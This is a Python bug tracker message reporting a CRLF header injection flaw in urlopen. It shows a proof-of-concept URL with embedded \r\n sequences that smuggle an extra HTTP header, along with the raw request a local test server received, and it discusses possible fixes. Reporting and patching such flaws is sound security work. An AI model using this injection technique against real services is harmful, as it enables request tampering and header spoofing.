Author martin.panter
Recipients martin.panter, orange, serhiy.storchaka, xiang.zhang
Date 2017-06-03.07:01:33
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1496473293.92.0.424276419664.issue30458@psf.upfronthosting.co.za>
In-reply-to
Content
You can also inject proper HTTP header fields (or do multiple requests) if you omit the space after the CRLF:

urlopen("http://localhost:8000/ HTTP/1.1\r\nHEADER: INJECTED\r\nIgnore:")

Data sent to the server:
>>> server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
>>> server.bind(("localhost", 8000))
>>> server.listen()
>>> [conn, addr] = server.accept()
>>> pprint(conn.recv(300).splitlines(keepends=True))
[b'GET / HTTP/1.1\r\n',
 b'HEADER: INJECTED\r\n',
 b'Ignore: HTTP/1.1\r\n',
 b'Accept-Encoding: identity\r\n',
 b'User-Agent: Python-urllib/3.5\r\n',
 b'Connection: close\r\n',
 b'Host: localhost:8000\r\n',
 b'\r\n']

Issue 14826 is already open about how “urlopen” handles spaces, and there is a patch in Issue 13359 that proposes to also encode newline characters. But if the CRLF or header injection is a security problem, then 2.7 etc could be changed to raise an exception (like Issue 22928), or to do percent encoding.
History
Date User Action Args
2017-06-03 07:01:33martin.pantersetrecipients: + martin.panter, serhiy.storchaka, xiang.zhang, orange
2017-06-03 07:01:33martin.pantersetmessageid: <1496473293.92.0.424276419664.issue30458@psf.upfronthosting.co.za>
2017-06-03 07:01:33martin.panterlinkissue30458 messages
2017-06-03 07:01:33martin.pantercreate